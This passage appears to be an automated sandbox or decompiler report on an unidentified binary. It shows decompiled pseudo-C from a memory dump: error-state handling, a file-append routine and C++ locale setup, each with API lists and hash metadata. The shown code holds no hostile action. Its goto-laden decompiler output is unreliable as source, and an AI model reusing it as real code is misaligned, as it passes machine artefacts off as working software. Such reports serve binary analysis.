                                                                                                										goto L35;
                                                                                                									} else {
                                                                                                										_t54 = E00FA905C(1, 0x364);
                                                                                                										__eflags = _t54;
                                                                                                										if(__eflags != 0) {
                                                                                                											__eflags = E00FA7A02(__eflags,  *0xfcf0d0, _t54);
                                                                                                											if(__eflags != 0) {
                                                                                                												E00FA5C1C(_t61, _t54, 0xfd10b4);
                                                                                                												E00FA609F(0);
                                                                                                												goto L45;
                                                                                                											} else {
                                                                                                												_t40 = 0;
                                                                                                												E00FA7A02(__eflags,  *0xfcf0d0, 0);
                                                                                                												_push(_t54);
                                                                                                												goto L41;
                                                                                                											}
                                                                                                										} else {
                                                                                                											_t40 = 0;
                                                                                                											__eflags = 0;
                                                                                                											E00FA7A02(0,  *0xfcf0d0, 0);
                                                                                                											_push(0);
                                                                                                											L41:
                                                                                                											E00FA609F();
                                                                                                											goto L36;
                                                                                                										}
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t54 = E00FA79C3(__eflags, _t9);
                                                                                                									__eflags = _t54;
                                                                                                									if(__eflags == 0) {
                                                                                                										_t9 =  *0xfcf0d0; // 0x6
                                                                                                										goto L38;
                                                                                                									} else {
                                                                                                										__eflags = _t54 - 0xffffffff;
                                                                                                										if(_t54 != 0xffffffff) {
                                                                                                											L45:
                                                                                                											_t40 = _t54;
                                                                                                										} else {
                                                                                                											L35:
                                                                                                											_t40 = 0;
                                                                                                											__eflags = 0;
                                                                                                											L36:
                                                                                                											_t54 = _t40;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								SetLastError(_t61);
                                                                                                								asm("sbb edi, edi");
                                                                                                								_t56 =  ~_t54 & _t40;
                                                                                                								__eflags = _t56;
                                                                                                								return _t56;
                                                                                                							} else {
                                                                                                								L29:
                                                                                                								__eflags = _t60;
                                                                                                								if(_t60 == 0) {
                                                                                                									goto L31;
                                                                                                								} else {
                                                                                                									return _t60;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					return _t53;
                                                                                                				}
                                                                                                			}























                                                                                                0x00fa5df2
                                                                                                0x00fa5df2
                                                                                                0x00fa5dfd
                                                                                                0x00fa5dff
                                                                                                0x00fa5e04
                                                                                                0x00fa5e07
                                                                                                0x00fa5e25
                                                                                                0x00fa5e28
                                                                                                0x00fa5e2d
                                                                                                0x00fa5e2f
                                                                                                0x00000000
                                                                                                0x00fa5e31
                                                                                                0x00fa5e3d
                                                                                                0x00fa5e40
                                                                                                0x00fa5e41
                                                                                                0x00fa5e43
                                                                                                0x00fa5e68
                                                                                                0x00fa5e6a
                                                                                                0x00fa5e83
                                                                                                0x00fa5e8a
                                                                                                0x00fa5e8f
                                                                                                0x00000000
                                                                                                0x00fa5e6c
                                                                                                0x00fa5e6c
                                                                                                0x00fa5e75
                                                                                                0x00fa5e7a
                                                                                                0x00000000
                                                                                                0x00fa5e7a
                                                                                                0x00fa5e45
                                                                                                0x00fa5e45
                                                                                                0x00fa5e45
                                                                                                0x00fa5e4e
                                                                                                0x00fa5e53
                                                                                                0x00fa5e54
                                                                                                0x00fa5e54
                                                                                                0x00fa5e59
                                                                                                0x00000000
                                                                                                0x00fa5e59
                                                                                                0x00fa5e43
                                                                                                0x00fa5e09
                                                                                                0x00fa5e0f
                                                                                                0x00fa5e13
                                                                                                0x00fa5e20
                                                                                                0x00000000
                                                                                                0x00fa5e15
                                                                                                0x00fa5e18
                                                                                                0x00fa5e92
                                                                                                0x00fa5e92
                                                                                                0x00fa5e1a
                                                                                                0x00fa5e1a
                                                                                                0x00fa5e1a
                                                                                                0x00fa5e1c
                                                                                                0x00fa5e1c
                                                                                                0x00fa5e1c
                                                                                                0x00fa5e18
                                                                                                0x00fa5e13
                                                                                                0x00fa5e95
                                                                                                0x00fa5e9d
                                                                                                0x00fa5e9f
                                                                                                0x00fa5ea1
                                                                                                0x00fa5ea9
                                                                                                0x00fa5eae
                                                                                                0x00fa5eaf
                                                                                                0x00fa5eb4
                                                                                                0x00fa5eb5
                                                                                                0x00fa5eb8
                                                                                                0x00fa5ed2
                                                                                                0x00fa5ed5
                                                                                                0x00fa5eda
                                                                                                0x00fa5edc
                                                                                                0x00000000
                                                                                                0x00fa5ede
                                                                                                0x00fa5eea
                                                                                                0x00fa5eed
                                                                                                0x00fa5eee
                                                                                                0x00fa5ef0
                                                                                                0x00fa5f13
                                                                                                0x00fa5f15
                                                                                                0x00fa5f2c
                                                                                                0x00fa5f33
                                                                                                0x00fa5f38
                                                                                                0x00000000
                                                                                                0x00fa5f17
                                                                                                0x00fa5f1e
                                                                                                0x00fa5f23
                                                                                                0x00000000
                                                                                                0x00fa5f23
                                                                                                0x00fa5ef2
                                                                                                0x00fa5ef9
                                                                                                0x00fa5efe
                                                                                                0x00fa5eff
                                                                                                0x00fa5eff
                                                                                                0x00fa5f04
                                                                                                0x00000000
                                                                                                0x00fa5f04
                                                                                                0x00fa5ef0
                                                                                                0x00fa5eba
                                                                                                0x00fa5ec0
                                                                                                0x00fa5ec2
                                                                                                0x00fa5ec4
                                                                                                0x00fa5ecd
                                                                                                0x00000000
                                                                                                0x00fa5ec6
                                                                                                0x00fa5ec6
                                                                                                0x00fa5ec9
                                                                                                0x00fa5f43
                                                                                                0x00fa5f43
                                                                                                0x00fa5f48
                                                                                                0x00fa5f4b
                                                                                                0x00fa5f4c
                                                                                                0x00fa5f4d
                                                                                                0x00fa5f54
                                                                                                0x00fa5f56
                                                                                                0x00fa5f5b
                                                                                                0x00fa5f5e
                                                                                                0x00fa5f7c
                                                                                                0x00fa5f7f
                                                                                                0x00fa5f84
                                                                                                0x00fa5f86
                                                                                                0x00000000
                                                                                                0x00fa5f88
                                                                                                0x00fa5f94
                                                                                                0x00fa5f98
                                                                                                0x00fa5f9a
                                                                                                0x00fa5fbf
                                                                                                0x00fa5fc1
                                                                                                0x00fa5fda
                                                                                                0x00fa5fe1
                                                                                                0x00000000
                                                                                                0x00fa5fc3
                                                                                                0x00fa5fc3
                                                                                                0x00fa5fcc
                                                                                                0x00fa5fd1
                                                                                                0x00000000
                                                                                                0x00fa5fd1
                                                                                                0x00fa5f9c
                                                                                                0x00fa5f9c
                                                                                                0x00fa5f9c
                                                                                                0x00fa5fa5
                                                                                                0x00fa5faa
                                                                                                0x00fa5fab
                                                                                                0x00fa5fab
                                                                                                0x00000000
                                                                                                0x00fa5fb0
                                                                                                0x00fa5f9a
                                                                                                0x00fa5f60
                                                                                                0x00fa5f66
                                                                                                0x00fa5f68
                                                                                                0x00fa5f6a
                                                                                                0x00fa5f77
                                                                                                0x00000000
                                                                                                0x00fa5f6c
                                                                                                0x00fa5f6c
                                                                                                0x00fa5f6f
                                                                                                0x00fa5fe9
                                                                                                0x00fa5fe9
                                                                                                0x00fa5f71
                                                                                                0x00fa5f71
                                                                                                0x00fa5f71
                                                                                                0x00fa5f71
                                                                                                0x00fa5f73
                                                                                                0x00fa5f73
                                                                                                0x00fa5f73
                                                                                                0x00fa5f6f
                                                                                                0x00fa5f6a
                                                                                                0x00fa5fec
                                                                                                0x00fa5ff4
                                                                                                0x00fa5ff6
                                                                                                0x00fa5ff6
                                                                                                0x00fa5ffd
                                                                                                0x00fa5ecb
                                                                                                0x00fa5f3b
                                                                                                0x00fa5f3b
                                                                                                0x00fa5f3d
                                                                                                0x00000000
                                                                                                0x00fa5f3f
                                                                                                0x00fa5f42
                                                                                                0x00fa5f42
                                                                                                0x00fa5f3d
                                                                                                0x00fa5ec9
                                                                                                0x00fa5ec4
                                                                                                0x00fa5ea3
                                                                                                0x00fa5ea8
                                                                                                0x00fa5ea8

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00000008,00FAA789,00F85649,00F8568F), ref: 00FA5DF7
                                                                                                • _free.LIBCMT ref: 00FA5E54
                                                                                                • _free.LIBCMT ref: 00FA5E8A
                                                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FA5E95
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_free
                                                                                                • String ID:
                                                                                                • API String ID: 2283115069-0
                                                                                                • Opcode ID: 65c995e6e05de24865a02661dcb7a81704a58112e3675342ec46a9df90623fb9
                                                                                                • Instruction ID: a9557faed427aa5314fee416746e5ec362949bd9985e6be3ac026b2127c0fbe0
                                                                                                • Opcode Fuzzy Hash: 65c995e6e05de24865a02661dcb7a81704a58112e3675342ec46a9df90623fb9
                                                                                                • Instruction Fuzzy Hash: D311C6F2604B057A9A1136745CC7E2F365EABC3F74B254634F529871E3ED298D05B120
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E00FA5F49(void* __ecx) {
                                                                                                				void* __esi;
                                                                                                				intOrPtr _t2;
                                                                                                				signed int _t3;
                                                                                                				signed int _t13;
                                                                                                				signed int _t18;
                                                                                                				long _t21;
                                                                                                
                                                                                                				_t21 = GetLastError();
                                                                                                				_t2 =  *0xfcf0d0; // 0x6
                                                                                                				_t24 = _t2 - 0xffffffff;
                                                                                                				if(_t2 == 0xffffffff) {
                                                                                                					L6:
                                                                                                					_t3 = E00FA7A02(__eflags, _t2, 0xffffffff);
                                                                                                					__eflags = _t3;
                                                                                                					if(_t3 == 0) {
                                                                                                						goto L3;
                                                                                                					} else {
                                                                                                						_t18 = E00FA905C(1, 0x364);
                                                                                                						__eflags = _t18;
                                                                                                						if(__eflags != 0) {
                                                                                                							__eflags = E00FA7A02(__eflags,  *0xfcf0d0, _t18);
                                                                                                							if(__eflags != 0) {
                                                                                                								E00FA5C1C(_t21, _t18, 0xfd10b4);
                                                                                                								E00FA609F(0);
                                                                                                								goto L13;
                                                                                                							} else {
                                                                                                								_t13 = 0;
                                                                                                								E00FA7A02(__eflags,  *0xfcf0d0, 0);
                                                                                                								_push(_t18);
                                                                                                								goto L9;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t13 = 0;
                                                                                                							__eflags = 0;
                                                                                                							E00FA7A02(0,  *0xfcf0d0, 0);
                                                                                                							_push(0);
                                                                                                							L9:
                                                                                                							E00FA609F();
                                                                                                							goto L4;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t18 = E00FA79C3(_t24, _t2);
                                                                                                					if(_t18 == 0) {
                                                                                                						_t2 =  *0xfcf0d0; // 0x6
                                                                                                						goto L6;
                                                                                                					} else {
                                                                                                						if(_t18 != 0xffffffff) {
                                                                                                							L13:
                                                                                                							_t13 = _t18;
                                                                                                						} else {
                                                                                                							L3:
                                                                                                							_t13 = 0;
                                                                                                							L4:
                                                                                                							_t18 = _t13;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				SetLastError(_t21);
                                                                                                				asm("sbb edi, edi");
                                                                                                				return  ~_t18 & _t13;
                                                                                                			}









                                                                                                0x00fa5f54
                                                                                                0x00fa5f56
                                                                                                0x00fa5f5b
                                                                                                0x00fa5f5e
                                                                                                0x00fa5f7c
                                                                                                0x00fa5f7f
                                                                                                0x00fa5f84
                                                                                                0x00fa5f86
                                                                                                0x00000000
                                                                                                0x00fa5f88
                                                                                                0x00fa5f94
                                                                                                0x00fa5f98
                                                                                                0x00fa5f9a
                                                                                                0x00fa5fbf
                                                                                                0x00fa5fc1
                                                                                                0x00fa5fda
                                                                                                0x00fa5fe1
                                                                                                0x00000000
                                                                                                0x00fa5fc3
                                                                                                0x00fa5fc3
                                                                                                0x00fa5fcc
                                                                                                0x00fa5fd1
                                                                                                0x00000000
                                                                                                0x00fa5fd1
                                                                                                0x00fa5f9c
                                                                                                0x00fa5f9c
                                                                                                0x00fa5f9c
                                                                                                0x00fa5fa5
                                                                                                0x00fa5faa
                                                                                                0x00fa5fab
                                                                                                0x00fa5fab
                                                                                                0x00000000
                                                                                                0x00fa5fb0
                                                                                                0x00fa5f9a
                                                                                                0x00fa5f60
                                                                                                0x00fa5f66
                                                                                                0x00fa5f6a
                                                                                                0x00fa5f77
                                                                                                0x00000000
                                                                                                0x00fa5f6c
                                                                                                0x00fa5f6f
                                                                                                0x00fa5fe9
                                                                                                0x00fa5fe9
                                                                                                0x00fa5f71
                                                                                                0x00fa5f71
                                                                                                0x00fa5f71
                                                                                                0x00fa5f73
                                                                                                0x00fa5f73
                                                                                                0x00fa5f73
                                                                                                0x00fa5f6f
                                                                                                0x00fa5f6a
                                                                                                0x00fa5fec
                                                                                                0x00fa5ff4
                                                                                                0x00fa5ffd

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,00000000,?,00F98D33,00000000,?,00F98DAB,00000000,00000000,00000000,00000000,00000000,?,00F72D8F,FD8FA683), ref: 00FA5F4E
                                                                                                • _free.LIBCMT ref: 00FA5FAB
                                                                                                • _free.LIBCMT ref: 00FA5FE1
                                                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00F98D33,00000000,?,00F98DAB,00000000,00000000,00000000,00000000,00000000), ref: 00FA5FEC
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_free
                                                                                                • String ID:
                                                                                                • API String ID: 2283115069-0
                                                                                                • Opcode ID: 09a15474ed6351159a9a0492103dc458e84683a00b59d95617e77e8105c5f7a5
                                                                                                • Instruction ID: f3a2afba5dbacb053d5742f3c4b17c8c6a1bc916dc27b3ff4bab4cbb1034b51a
                                                                                                • Opcode Fuzzy Hash: 09a15474ed6351159a9a0492103dc458e84683a00b59d95617e77e8105c5f7a5
                                                                                                • Instruction Fuzzy Hash: 5211E5F6648B057ECA113674AC87E2F355AABC3FB4B250234F515871E2EE798C06B520
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 81%
                                                                                                			E00F80B20(void* __ecx, WCHAR* __edx) {
                                                                                                				struct _OVERLAPPED* _v8;
                                                                                                				char _v16;
                                                                                                				long _v20;
                                                                                                				struct _OVERLAPPED* _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				signed int _t14;
                                                                                                				void* _t19;
                                                                                                				int _t22;
                                                                                                				void* _t24;
                                                                                                				void* _t29;
                                                                                                				void* _t32;
                                                                                                				signed int _t34;
                                                                                                
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb6de8);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t14 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t14 ^ _t34);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t29 = __ecx;
                                                                                                				_t32 = CreateFileW(__edx, 0x40000000, 1, 0, 4, 0x80, 0);
                                                                                                				_v28 = 0xfc6b50;
                                                                                                				_v24 = _t32;
                                                                                                				_v8 = 0;
                                                                                                				SetFilePointer(_t32, 0, 0, 2);
                                                                                                				_t24 = 0;
                                                                                                				_t19 = _t29;
                                                                                                				if( *_t29 != 0) {
                                                                                                					do {
                                                                                                						_t19 = _t19 + 2;
                                                                                                						_t24 = _t24 + 1;
                                                                                                					} while ( *_t19 != 0);
                                                                                                				}
                                                                                                				_v20 = 0;
                                                                                                				_t22 = WriteFile(_t32, _t29, _t24 + _t24,  &_v20, 0);
                                                                                                				_v8 = 0xffffffff;
                                                                                                				_v28 = 0xfc6b50;
                                                                                                				if(_t32 != 0) {
                                                                                                					_t22 = CloseHandle(_t32);
                                                                                                					_v24 = 0;
                                                                                                				}
                                                                                                				 *[fs:0x0] = _v16;
                                                                                                				return _t22;
                                                                                                			}















                                                                                                0x00f80b23
                                                                                                0x00f80b25
                                                                                                0x00f80b30
                                                                                                0x00f80b36
                                                                                                0x00f80b3d
                                                                                                0x00f80b41
                                                                                                0x00f80b47
                                                                                                0x00f80b62
                                                                                                0x00f80b64
                                                                                                0x00f80b6b
                                                                                                0x00f80b6e
                                                                                                0x00f80b7c
                                                                                                0x00f80b82
                                                                                                0x00f80b84
                                                                                                0x00f80b89
                                                                                                0x00f80b90
                                                                                                0x00f80b90
                                                                                                0x00f80b93
                                                                                                0x00f80b94
                                                                                                0x00f80b90
                                                                                                0x00f80b9f
                                                                                                0x00f80bad
                                                                                                0x00f80bb3
                                                                                                0x00f80bba
                                                                                                0x00f80bc3
                                                                                                0x00f80bc6
                                                                                                0x00f80bcc
                                                                                                0x00f80bcc
                                                                                                0x00f80bd6
                                                                                                0x00f80be3

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,FD8FA683), ref: 00F80B5C
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F80B7C
                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F80BAD
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F80BC6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3604237281-0
                                                                                                • Opcode ID: c0f88398b106d58b39d40777377659d492a93e5c76d7f74e89aa2f8ef460ee42
                                                                                                • Instruction ID: fa84921a7073909a8b288df53a5a3924d6829633cc6d48689e4d5ad01c972237
                                                                                                • Opcode Fuzzy Hash: c0f88398b106d58b39d40777377659d492a93e5c76d7f74e89aa2f8ef460ee42
                                                                                                • Instruction Fuzzy Hash: 1D21B170A40319AFD720EF14DC4AFDABBB8EB45B64F104219F511E72C0DBB46A099B94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F878C0(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				intOrPtr _v8;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				signed int _t45;
                                                                                                				void* _t72;
                                                                                                				short* _t106;
                                                                                                				signed int _t118;
                                                                                                				signed int _t119;
                                                                                                				signed int _t121;
                                                                                                				signed int _t122;
                                                                                                				signed int _t123;
                                                                                                				short* _t124;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t121 =  *0xfd0b18; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t121;
                                                                                                				_t45 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t117 = _t45;
                                                                                                				if(_t45 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t117);
                                                                                                				} else {
                                                                                                					if(_t121 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F88BB9(_t117, _t121, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t117, _t121);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t122 =  *0xfd0ae8; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t122;
                                                                                                							_t118 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t118;
                                                                                                							if(_t118 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t118);
                                                                                                							} else {
                                                                                                								__eflags = _t122;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F88C25(_t118, _t122, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t118, _t122);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t123 =  *0xfd0b1c; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t123;
                                                                                                										_t119 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t119;
                                                                                                										if(_t119 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t119);
                                                                                                										} else {
                                                                                                											__eflags = _t123;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												_t72 = E00F88C91(_t119, _t123, __eflags);
                                                                                                												_pop(_t106);
                                                                                                												__eflags = _t72 - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(_t123);
                                                                                                													_t124 = _t106;
                                                                                                													_t38 = _t124 + 0x10;
                                                                                                													 *_t38 =  *(_t124 + 0x10) & 0x00000000;
                                                                                                													__eflags =  *_t38;
                                                                                                													 *((intOrPtr*)(_t124 + 0x14)) = 7;
                                                                                                													 *_t124 = 0;
                                                                                                													E00F8D9F3(_v8);
                                                                                                													return _t124;
                                                                                                												} else {
                                                                                                													_t119 = _v16;
                                                                                                													_v16 = _t119;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t119);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t119 + 4))))();
                                                                                                													 *0xfd0b1c = _t119;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t119 = _t123;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t118 = _v16;
                                                                                                										_v16 = _t118;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t118);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 4))))();
                                                                                                										 *0xfd0ae8 = _t118;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t118 = _t122;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t117 = _v16;
                                                                                                							_v16 = _t117;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t117);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 4))))();
                                                                                                							 *0xfd0b18 = _t117;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t117 = _t121;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}
















                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f1
                                                                                                0x00f878f6
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F878C7
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F878D1
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F87922
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F87942
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: 42c79750fc37819d7e36709a63fb904b563635064ac16cd35529d452a70907de
                                                                                                • Instruction ID: 3f3f25058a4b8d99675bc524ce1aed7b1942b15fdec7a4abb53d5cf5a97c2846
                                                                                                • Opcode Fuzzy Hash: 42c79750fc37819d7e36709a63fb904b563635064ac16cd35529d452a70907de
                                                                                                • Instruction Fuzzy Hash: 9C01A1769042199BCB05FB64CC45BFD7762AF84760F24400AE405AB291DF38DE02AB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 70%
                                                                                                			E00F879EA(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				intOrPtr _v0;
                                                                                                				signed int _v4;
                                                                                                				void* _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr* _t21;
                                                                                                				void* _t26;
                                                                                                				short* _t40;
                                                                                                				void* _t47;
                                                                                                				short* _t48;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t47 =  *0xfd0b1c; // 0x0
